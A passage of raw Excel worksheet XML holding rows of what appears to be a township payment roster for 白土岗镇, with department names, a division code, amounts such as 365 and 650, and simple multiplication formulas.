      <c r="D2478" s="91" t="s">
        <v>6533</v>
      </c>
      <c r="E2478" s="91" t="s">
        <v>6534</v>
      </c>
      <c r="F2478" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2478" s="17">
        <v>1</v>
      </c>
      <c r="H2478" s="18">
        <v>365</v>
      </c>
      <c r="I2478" s="17">
        <f t="shared" si="120"/>
        <v>365</v>
      </c>
      <c r="J2478" s="29">
        <v>45505</v>
      </c>
      <c r="K2478" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2479" customHeight="1" spans="1:11">
      <c r="A2479" s="16" t="s">
        <v>6535</v>
      </c>
      <c r="B2479" s="17" t="s">
        <v>6343</v>
      </c>
      <c r="C2479" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2479" s="17" t="s">
        <v>6536</v>
      </c>
      <c r="E2479" s="17" t="s">
        <v>6174</v>
      </c>
      <c r="F2479" s="17" t="s">
        <v>6350</v>
      </c>
      <c r="G2479" s="17">
        <v>1</v>
      </c>
      <c r="H2479" s="18">
        <v>365</v>
      </c>
      <c r="I2479" s="17">
        <f t="shared" si="120"/>
        <v>365</v>
      </c>
      <c r="J2479" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2479" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2480" customHeight="1" spans="1:11">
      <c r="A2480" s="16" t="s">
        <v>6537</v>
      </c>
      <c r="B2480" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2480" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="D2480" s="17" t="s">
        <v>6539</v>
      </c>
      <c r="E2480" s="17" t="s">
        <v>6540</v>
      </c>
      <c r="F2480" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2480" s="17">
        <v>1</v>
      </c>
      <c r="H2480" s="18">
        <v>365</v>
      </c>
      <c r="I2480" s="17">
        <f t="shared" si="120"/>
        <v>365</v>
      </c>
      <c r="J2480" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2480" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2481" customHeight="1" spans="1:11">
      <c r="A2481" s="16" t="s">
        <v>6542</v>
      </c>
      <c r="B2481" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2481" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="D2481" s="17" t="s">
        <v>6543</v>
      </c>
      <c r="E2481" s="17" t="s">
        <v>6544</v>
      </c>
      <c r="F2481" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2481" s="17">
        <v>1</v>
      </c>
      <c r="H2481" s="18">
        <v>365</v>
      </c>
      <c r="I2481" s="17">
        <f t="shared" si="120"/>
        <v>365</v>
      </c>
      <c r="J2481" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2481" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2482" customHeight="1" spans="1:11">
      <c r="A2482" s="16" t="s">
        <v>6545</v>
      </c>
      <c r="B2482" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2482" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="D2482" s="17" t="s">
        <v>6546</v>
      </c>
      <c r="E2482" s="17" t="s">
        <v>6547</v>
      </c>
      <c r="F2482" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2482" s="17">
        <v>2</v>
      </c>
      <c r="H2482" s="18">
        <v>325</v>
      </c>
      <c r="I2482" s="17">
        <f t="shared" si="120"/>
        <v>650</v>
      </c>
      <c r="J2482" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2482" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2483" customHeight="1" spans="1:11">
      <c r="A2483" s="16" t="s">
        <v>6548</v>
      </c>
      <c r="B2483" s="17" t="str">
        <f>B2482</f>
        <v>白土岗镇</v>
      </c>
      <c r="C2483" s="17" t="str">
        <f>C2482</f>
        <v>白土岗镇</v>
      </c>
      <c r="D2483" s="16" t="s">
        <v>6549</v>
      </c>
      <c r="E2483" s="16" t="s">
        <v>6550</v>
      </c>
      <c r="F2483" s="121" t="str">
        <f>F2482</f>
        <v>411321122001</v>
      </c>
      <c r="G2483" s="17"/>
      <c r="H2483" s="17"/>
      <c r="I2483" s="17"/>
      <c r="J2483" s="17"/>
      <c r="K2483" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2484" customHeight="1" spans="1:11">
      <c r="A2484" s="16" t="s">
        <v>6551</v>
      </c>
      <c r="B2484" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2484" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="D2484" s="17" t="s">
        <v>6552</v>
      </c>
      <c r="E2484" s="17" t="s">
        <v>6553</v>
      </c>
      <c r="F2484" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2484" s="17">
        <v>1</v>
      </c>
      <c r="H2484" s="18">
        <v>365</v>
      </c>
      <c r="I2484" s="17">
        <f>H2484*G2484</f>
        <v>365</v>
      </c>
      <c r="J2484" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2484" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2485" customHeight="1" spans="1:11">
      <c r="A2485" s="16" t="s">
        <v>6554</v>
      </c>
      <c r="B2485" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2485" s="17" t="s">
        <v>3436</v>
      </c>
      <c r="D2485" s="17" t="s">
        <v>6555</v>
      </c>
      <c r="E2485" s="17" t="s">
        <v>1904</v>
      </c>
      <c r="F2485" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2485" s="17">
        <v>1</v>
      </c>
      <c r="H2485" s="18">
        <v>365</v>
      </c>
      <c r="I2485" s="17">
        <f>H2485*G2485</f>
        <v>365</v>
      </c>
      <c r="J2485" s="17">
        <v>45170</v>
      </c>
      <c r="K2485" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2486" customHeight="1" spans="1:11">
      <c r="A2486" s="16" t="s">
        <v>6556</v>
      </c>
      <c r="B2486" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2486" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="D2486" s="17" t="s">
        <v>6557</v>
      </c>
      <c r="E2486" s="17" t="s">
        <v>6558</v>
      </c>
      <c r="F2486" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2486" s="17">
        <v>1</v>
      </c>
      <c r="H2486" s="18">
        <v>365</v>
      </c>
      <c r="I2486" s="17">
        <f>H2486*G2486</f>
        <v>365</v>
      </c>
      <c r="J2486" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2486" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2487" customHeight="1" spans="1:11">
      <c r="A2487" s="16" t="s">
        <v>6559</v>
      </c>
      <c r="B2487" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2487" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="D2487" s="17" t="s">
        <v>6560</v>
      </c>
      <c r="E2487" s="17" t="s">
        <v>6561</v>
      </c>
      <c r="F2487" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2487" s="17">
        <v>1</v>
      </c>
      <c r="H2487" s="18">
        <v>365</v>
      </c>
      <c r="I2487" s="17">
        <f>H2487*G2487</f>
        <v>365</v>
      </c>
      <c r="J2487" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2487" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2488" customHeight="1" spans="1:11">
      <c r="A2488" s="16" t="s">
        <v>6562</v>
      </c>
      <c r="B2488" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2488" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="D2488" s="17" t="s">
        <v>6563</v>
      </c>
      <c r="E2488" s="17" t="s">
        <v>6564</v>
      </c>
      <c r="F2488" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2488" s="17">
        <v>2</v>
      </c>
      <c r="H2488" s="18">
        <v>325</v>
      </c>
      <c r="I2488" s="17">
        <f>H2488*G2488</f>
        <v>650</v>
      </c>
      <c r="J2488" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2488" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2489" customHeight="1" spans="1:11">
      <c r="A2489" s="16" t="s">
        <v>6565</v>
      </c>
      <c r="B2489" s="17" t="str">
        <f>B2488</f>
        <v>白土岗镇</v>
      </c>
      <c r="C2489" s="17" t="str">
        <f>C2488</f>
        <v>白土岗镇</v>
      </c>
      <c r="D2489" s="23" t="s">
        <v>6566</v>
      </c>
      <c r="E2489" s="23" t="s">
        <v>6567</v>
      </c>
      <c r="F2489" s="121" t="str">
        <f>F2488</f>
        <v>411321122001</v>
      </c>
      <c r="G2489" s="17"/>
      <c r="H2489" s="17"/>
      <c r="I2489" s="17"/>
      <c r="J2489" s="17"/>
      <c r="K2489" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2490" customHeight="1" spans="1:11">
      <c r="A2490" s="16" t="s">
        <v>6568</v>
      </c>
      <c r="B2490" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2490" s="17" t="s">
        <v>5367</v>
      </c>
      <c r="D2490" s="17" t="s">
        <v>6569</v>
      </c>
      <c r="E2490" s="17" t="s">
        <v>6570</v>
      </c>
      <c r="F2490" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2490" s="17">
        <v>1</v>
      </c>
      <c r="H2490" s="18">
        <v>365</v>
      </c>
      <c r="I2490" s="17">
        <f>H2490*G2490</f>
        <v>365</v>
      </c>
      <c r="J2490" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2490" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2491" customHeight="1" spans="1:11">
      <c r="A2491" s="16" t="s">
        <v>6571</v>
      </c>
      <c r="B2491" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2491" s="17" t="s">
        <v>5367</v>
      </c>
      <c r="D2491" s="17" t="s">
        <v>6572</v>
      </c>
      <c r="E2491" s="17" t="s">
        <v>6573</v>
      </c>
      <c r="F2491" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2491" s="17">
        <v>1</v>
      </c>
      <c r="H2491" s="17">
        <v>420</v>
      </c>
      <c r="I2491" s="17">
        <f>H2491*G2491</f>
        <v>420</v>
      </c>
      <c r="J2491" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2491" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2492" customHeight="1" spans="1:11">
      <c r="A2492" s="16" t="s">
        <v>6574</v>
      </c>
      <c r="B2492" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2492" s="17" t="s">
        <v>6127</v>
      </c>
      <c r="D2492" s="17" t="s">
        <v>6575</v>
      </c>
      <c r="E2492" s="17" t="s">
        <v>1147</v>
      </c>
      <c r="F2492" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2492" s="17">
        <v>1</v>
      </c>
      <c r="H2492" s="18">
        <v>365</v>
      </c>
      <c r="I2492" s="17">
        <f>H2492*G2492</f>
        <v>365</v>
      </c>
      <c r="J2492" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2492" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2493" customHeight="1" spans="1:11">
      <c r="A2493" s="16" t="s">
        <v>6576</v>
      </c>
      <c r="B2493" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2493" s="17" t="s">
        <v>6127</v>
      </c>
      <c r="D2493" s="17" t="s">
        <v>3076</v>
      </c>
      <c r="E2493" s="17" t="s">
        <v>3036</v>
      </c>
      <c r="F2493" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2493" s="17">
        <v>1</v>
      </c>
      <c r="H2493" s="18">
        <v>365</v>
      </c>
      <c r="I2493" s="17">
        <f>H2493*G2493</f>
        <v>365</v>
      </c>
      <c r="J2493" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2493" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2494" customHeight="1" spans="1:11">
      <c r="A2494" s="16" t="s">
        <v>6577</v>
      </c>
      <c r="B2494" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2494" s="17" t="s">
        <v>6341</v>
      </c>
      <c r="D2494" s="17" t="s">
        <v>6578</v>
      </c>
      <c r="E2494" s="17" t="s">
        <v>481</v>
      </c>
      <c r="F2494" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2494" s="17">
        <v>2</v>
      </c>
      <c r="H2494" s="18">
        <v>325</v>
      </c>
      <c r="I2494" s="17">
        <f>H2494*G2494</f>
        <v>650</v>
      </c>
      <c r="J2494" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2494" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2495" customHeight="1" spans="1:11">
      <c r="A2495" s="16" t="s">
        <v>6579</v>
      </c>
      <c r="B2495" s="17" t="str">
        <f>B2494</f>
        <v>白土岗镇</v>
      </c>
      <c r="C2495" s="17" t="str">
        <f>C2494</f>
        <v>外贸局</v>
      </c>
      <c r="D2495" s="17" t="s">
        <v>6580</v>
      </c>
      <c r="E2495" s="16" t="s">
        <v>6581</v>
      </c>
      <c r="F2495" s="121" t="str">
        <f>F2494</f>
        <v>411321122001</v>
      </c>
      <c r="G2495" s="17"/>
      <c r="H2495" s="17"/>
      <c r="I2495" s="17"/>
      <c r="J2495" s="17"/>
      <c r="K2495" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2496" customHeight="1" spans="1:11">
      <c r="A2496" s="16" t="s">
        <v>6582</v>
      </c>
      <c r="B2496" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2496" s="17" t="s">
        <v>6424</v>
      </c>
      <c r="D2496" s="17" t="s">
        <v>6583</v>
      </c>
      <c r="E2496" s="17" t="s">
        <v>6584</v>
      </c>
      <c r="F2496" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2496" s="17">
        <v>2</v>
      </c>
      <c r="H2496" s="18">
        <v>325</v>
      </c>
      <c r="I2496" s="17">
        <f>H2496*G2496</f>
        <v>650</v>
      </c>
      <c r="J2496" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2496" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2497" customHeight="1" spans="1:11">
      <c r="A2497" s="16" t="s">
        <v>6585</v>
      </c>
      <c r="B2497" s="17" t="str">
        <f>B2496</f>
        <v>白土岗镇</v>
      </c>
      <c r="C2497" s="17" t="str">
        <f>C2496</f>
        <v>工信局</v>
      </c>
      <c r="D2497" s="23" t="s">
        <v>6586</v>
      </c>
      <c r="E2497" s="23" t="s">
        <v>2473</v>
      </c>
      <c r="F2497" s="121" t="str">
        <f>F2496</f>
        <v>411321122001</v>
      </c>
      <c r="G2497" s="17"/>
      <c r="H2497" s="17"/>
      <c r="I2497" s="17"/>
      <c r="J2497" s="17"/>
      <c r="K2497" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2498" customHeight="1" spans="1:11">
      <c r="A2498" s="16" t="s">
        <v>6587</v>
      </c>
      <c r="B2498" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2498" s="17" t="s">
        <v>6424</v>
      </c>
      <c r="D2498" s="17" t="s">
        <v>6588</v>
      </c>
      <c r="E2498" s="17" t="s">
        <v>6589</v>
      </c>
      <c r="F2498" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2498" s="17">
        <v>2</v>
      </c>
      <c r="H2498" s="18">
        <v>325</v>
      </c>
      <c r="I2498" s="17">
        <f>H2498*G2498</f>
        <v>650</v>
      </c>
      <c r="J2498" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2498" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2499" customHeight="1" spans="1:11">
      <c r="A2499" s="16" t="s">
        <v>6590</v>
      </c>
      <c r="B2499" s="17" t="str">
        <f>B2498</f>
        <v>白土岗镇</v>
      </c>
      <c r="C2499" s="17" t="str">
        <f>C2498</f>
        <v>工信局</v>
      </c>
      <c r="D2499" s="16" t="s">
        <v>6591</v>
      </c>
      <c r="E2499" s="16" t="s">
        <v>6592</v>
      </c>
      <c r="F2499" s="121" t="str">
        <f>F2498</f>
        <v>411321122001</v>
      </c>
      <c r="G2499" s="17"/>
      <c r="H2499" s="17"/>
      <c r="I2499" s="17"/>
      <c r="J2499" s="17"/>
      <c r="K2499" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2500" customHeight="1" spans="1:11">
      <c r="A2500" s="16" t="s">
        <v>6593</v>
      </c>
      <c r="B2500" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2500" s="17" t="s">
        <v>6424</v>
      </c>
      <c r="D2500" s="17" t="s">
        <v>6594</v>
      </c>
      <c r="E2500" s="17" t="s">
        <v>6595</v>
      </c>
      <c r="F2500" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2500" s="17">
        <v>1</v>
      </c>
      <c r="H2500" s="18">
        <v>365</v>
      </c>
      <c r="I2500" s="17">
        <f>H2500*G2500</f>
        <v>365</v>
      </c>
      <c r="J2500" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2500" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2501" customHeight="1" spans="1:11">
      <c r="A2501" s="16" t="s">
        <v>6596</v>
      </c>
      <c r="B2501" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2501" s="17" t="s">
        <v>6597</v>
      </c>
      <c r="D2501" s="17" t="s">
        <v>6598</v>
      </c>
      <c r="E2501" s="17" t="s">
        <v>6599</v>
      </c>
      <c r="F2501" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2501" s="17">
        <v>1</v>
      </c>
      <c r="H2501" s="17">
        <v>420</v>
      </c>
      <c r="I2501" s="17">
        <f>H2501*G2501</f>
        <v>420</v>
      </c>
      <c r="J2501" s="17" t="s">
        <v>4642</v>
      </c>
      <c r="K2501" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2502" customHeight="1" spans="1:11">
      <c r="A2502" s="16" t="s">
        <v>6600</v>
      </c>
      <c r="B2502" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2502" s="17" t="s">
        <v>6601</v>
      </c>
      <c r="D2502" s="17" t="s">
        <v>6602</v>
      </c>
      <c r="E2502" s="17" t="s">
        <v>6603</v>
      </c>
      <c r="F2502" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2502" s="17">
        <v>1</v>
      </c>
      <c r="H2502" s="18">
        <v>365</v>
      </c>
      <c r="I2502" s="17">
        <f>H2502*G2502</f>
        <v>365</v>
      </c>
      <c r="J2502" s="17" t="s">
        <v>4642</v>
      </c>
      <c r="K2502" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2503" customHeight="1" spans="1:11">
      <c r="A2503" s="16" t="s">
        <v>6604</v>
      </c>
      <c r="B2503" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2503" s="17" t="s">
        <v>3448</v>
      </c>
      <c r="D2503" s="17" t="s">
        <v>6605</v>
      </c>
      <c r="E2503" s="17" t="s">
        <v>2217</v>
      </c>
      <c r="F2503" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2503" s="17">
        <v>1</v>
      </c>
      <c r="H2503" s="18">
        <v>365</v>
      </c>
      <c r="I2503" s="17">
        <f>H2503*G2503</f>
        <v>365</v>
      </c>
      <c r="J2503" s="17" t="s">
        <v>6606</v>
      </c>
      <c r="K2503" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2504" customHeight="1" spans="1:11">
      <c r="A2504" s="16" t="s">
        <v>6607</v>
      </c>
      <c r="B2504" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2504" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2504" s="17" t="s">
        <v>6608</v>
      </c>
      <c r="E2504" s="17" t="s">
        <v>6609</v>
      </c>
      <c r="F2504" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2504" s="17">
        <v>2</v>
      </c>
      <c r="H2504" s="18">
        <v>325</v>
      </c>
      <c r="I2504" s="17">
        <f>H2504*G2504</f>
        <v>650</v>
      </c>
      <c r="J2504" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2504" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2505" customHeight="1" spans="1:11">
      <c r="A2505" s="16" t="s">
        <v>6610</v>
      </c>
      <c r="B2505" s="17" t="str">
        <f>B2504</f>
        <v>白土岗镇</v>
      </c>
      <c r="C2505" s="61" t="str">
        <f>C2504</f>
        <v>县社</v>
      </c>
      <c r="D2505" s="24" t="s">
        <v>6611</v>
      </c>
      <c r="E2505" s="24" t="s">
        <v>6612</v>
      </c>
      <c r="F2505" s="121" t="str">
        <f>F2504</f>
        <v>411321122001</v>
      </c>
      <c r="G2505" s="17"/>
      <c r="H2505" s="17"/>
      <c r="I2505" s="17"/>
      <c r="J2505" s="29"/>
      <c r="K2505" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2506" customHeight="1" spans="1:11">
      <c r="A2506" s="16" t="s">
        <v>6613</v>
      </c>
      <c r="B2506" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2506" s="61" t="s">
        <v>3436</v>
      </c>
      <c r="D2506" s="61" t="s">
        <v>6614</v>
      </c>
      <c r="E2506" s="63" t="s">
        <v>6570</v>
      </c>
      <c r="F2506" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2506" s="17">
        <v>1</v>
      </c>
      <c r="H2506" s="18">
        <v>365</v>
      </c>
      <c r="I2506" s="17">
        <f t="shared" ref="I2506:I2512" si="121">H2506*G2506</f>
        <v>365</v>
      </c>
      <c r="J2506" s="29">
        <v>45566</v>
      </c>
      <c r="K2506" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2507" customHeight="1" spans="1:11">
      <c r="A2507" s="16" t="s">
        <v>6615</v>
      </c>
      <c r="B2507" s="17" t="s">
        <v>6538</v>
      </c>
      <c r="C2507" s="17" t="s">
        <v>5377</v>
      </c>
      <c r="D2507" s="17" t="s">
        <v>6616</v>
      </c>
      <c r="E2507" s="17" t="s">
        <v>2606</v>
      </c>
      <c r="F2507" s="121" t="s">
        <v>6541</v>
      </c>
      <c r="G2507" s="17">
        <v>1</v>
      </c>
      <c r="H2507" s="18">
        <v>365</v>
      </c>
      <c r="I2507" s="17">
        <f t="shared" si="121"/>
        <v>365</v>
      </c>
      <c r="J2507" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2507" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2508" customHeight="1" spans="1:11">
      <c r="A2508" s="16" t="s">
        <v>6617</v>
      </c>
      <c r="B2508" s="17" t="s">
        <v>6618</v>
      </c>
      <c r="C2508" s="17" t="s">
        <v>3448</v>
      </c>
      <c r="D2508" s="17" t="s">
        <v>6619</v>
      </c>
      <c r="E2508" s="17" t="s">
        <v>6620</v>
      </c>
      <c r="F2508" s="17" t="s">
        <v>6621</v>
      </c>
      <c r="G2508" s="17">
        <v>1</v>
      </c>
      <c r="H2508" s="18">
        <v>365</v>
      </c>
      <c r="I2508" s="17">
        <f t="shared" si="121"/>
        <v>365</v>
      </c>
      <c r="J2508" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2508" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2509" customHeight="1" spans="1:11">
      <c r="A2509" s="16" t="s">
        <v>6622</v>
      </c>
      <c r="B2509" s="17" t="s">
        <v>6618</v>
      </c>
      <c r="C2509" s="17" t="s">
        <v>5367</v>
      </c>
      <c r="D2509" s="17" t="s">
        <v>6623</v>
      </c>
      <c r="E2509" s="17" t="s">
        <v>6624</v>
      </c>
      <c r="F2509" s="17" t="s">
        <v>6621</v>
      </c>
      <c r="G2509" s="17">
        <v>1</v>
      </c>
      <c r="H2509" s="18">
        <v>365</v>
      </c>
      <c r="I2509" s="17">
        <f t="shared" si="121"/>
        <v>365</v>
      </c>
      <c r="J2509" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2509" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2510" customHeight="1" spans="1:11">
      <c r="A2510" s="16" t="s">
        <v>6625</v>
      </c>
      <c r="B2510" s="17" t="s">
        <v>6618</v>
      </c>
      <c r="C2510" s="17" t="s">
        <v>3457</v>
      </c>
      <c r="D2510" s="17" t="s">
        <v>6626</v>
      </c>
      <c r="E2510" s="17" t="s">
        <v>284</v>
      </c>
      <c r="F2510" s="17" t="s">
        <v>6621</v>
      </c>
      <c r="G2510" s="17">
        <v>1</v>
      </c>
      <c r="H2510" s="18">
        <v>365</v>
      </c>
      <c r="I2510" s="17">
        <f t="shared" si="121"/>
        <v>365</v>
      </c>
      <c r="J2510" s="29">
        <v>45566</v>
      </c>
      <c r="K2510" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2511" customHeight="1" spans="1:11">
      <c r="A2511" s="16" t="s">
        <v>6627</v>
      </c>
      <c r="B2511" s="17" t="s">
        <v>6618</v>
      </c>
      <c r="C2511" s="17" t="s">
        <v>6628</v>
      </c>
      <c r="D2511" s="17" t="s">
        <v>6629</v>
      </c>
      <c r="E2511" s="17" t="s">
        <v>6630</v>
      </c>
      <c r="F2511" s="121" t="s">
        <v>6621</v>
      </c>
      <c r="G2511" s="17">
        <v>1</v>
      </c>
      <c r="H2511" s="18">
        <v>365</v>
      </c>
      <c r="I2511" s="17">
        <f t="shared" si="121"/>
        <v>365</v>
      </c>
      <c r="J2511" s="29">
        <v>45658</v>
      </c>
      <c r="K2511" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2512" customHeight="1" spans="1:11">
      <c r="A2512" s="16" t="s">
        <v>6631</v>
      </c>
      <c r="B2512" s="17" t="s">
        <v>6618</v>
      </c>
      <c r="C2512" s="17" t="s">
        <v>3457</v>
      </c>
      <c r="D2512" s="17" t="s">
        <v>6632</v>
      </c>
      <c r="E2512" s="17" t="s">
        <v>6633</v>
      </c>
      <c r="F2512" s="17" t="s">
        <v>6621</v>
      </c>
      <c r="G2512" s="17">
        <v>1</v>
      </c>
      <c r="H2512" s="18">
        <v>365</v>
      </c>
      <c r="I2512" s="17">
        <f t="shared" si="121"/>
        <v>365</v>
      </c>
      <c r="J2512" s="17" t="s">
        <v>4185</v>
      </c>
      <c r="K2512" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2513" customHeight="1" spans="1:11">
      <c r="A2513" s="16" t="s">
        <v>6634</v>
      </c>
      <c r="B2513" s="17" t="s">
        <v>6635</v>
      </c>
      <c r="C2513" s="17" t="s">
        <v>6635</v>
      </c>
      <c r="D2513" s="17" t="s">
        <v>6636</v>
      </c>
      <c r="E2513" s="17" t="s">
        <v>292</v>
      </c>
      <c r="F2513" s="17" t="s">
        <v>6637</v>
      </c>
      <c r="G2513" s="17">
        <v>1</v>
      </c>
      <c r="H2513" s="18">
        <v>365</v>
      </c>
      <c r="I2513" s="17">
        <f t="shared" ref="I2513:I2533" si="122">H2513*G2513</f>
        <v>365</v>
      </c>
      <c r="J2513" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2513" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2514" customHeight="1" spans="1:11">
      <c r="A2514" s="16" t="s">
        <v>6638</v>
      </c>
      <c r="B2514" s="17" t="s">
        <v>6635</v>
      </c>
      <c r="C2514" s="17" t="s">
        <v>6635</v>
      </c>
      <c r="D2514" s="17" t="s">
        <v>6639</v>
      </c>
      <c r="E2514" s="17" t="s">
        <v>6640</v>
      </c>
      <c r="F2514" s="17" t="s">
        <v>6637</v>
      </c>
      <c r="G2514" s="17">
        <v>1</v>
      </c>
      <c r="H2514" s="18">
        <v>365</v>
      </c>
      <c r="I2514" s="17">
        <f t="shared" si="122"/>
        <v>365</v>
      </c>
      <c r="J2514" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2514" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2515" customHeight="1" spans="1:11">
      <c r="A2515" s="16" t="s">
        <v>6641</v>
      </c>
      <c r="B2515" s="17" t="s">
        <v>6635</v>
      </c>
      <c r="C2515" s="17" t="s">
        <v>6635</v>
      </c>
      <c r="D2515" s="17" t="s">
        <v>6642</v>
      </c>
      <c r="E2515" s="17" t="s">
        <v>6643</v>
      </c>
      <c r="F2515" s="17" t="s">
        <v>6637</v>
      </c>
      <c r="G2515" s="17">
        <v>1</v>
      </c>
      <c r="H2515" s="18">
        <v>365</v>
      </c>
      <c r="I2515" s="17">
        <f t="shared" si="122"/>
        <v>365</v>
      </c>
      <c r="J2515" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2515" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2516" customHeight="1" spans="1:11">
      <c r="A2516" s="16" t="s">
        <v>6644</v>
      </c>
      <c r="B2516" s="17" t="s">
        <v>6635</v>
      </c>
      <c r="C2516" s="17" t="s">
        <v>6635</v>
      </c>
      <c r="D2516" s="17" t="s">
        <v>6645</v>
      </c>
      <c r="E2516" s="17" t="s">
        <v>6646</v>
      </c>
      <c r="F2516" s="17" t="s">
        <v>6637</v>
      </c>
      <c r="G2516" s="17">
        <v>1</v>
      </c>
      <c r="H2516" s="18">
        <v>365</v>
      </c>
      <c r="I2516" s="17">
        <f t="shared" si="122"/>
        <v>365</v>
      </c>
      <c r="J2516" s="17" t="s">
        <v>224</v>
      </c>
      <c r="K2516" s="17" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2517" customHeight="1" spans="1:11">
      <c r="A2517" s="16" t="s">
        <v>6647</v>
      </c>
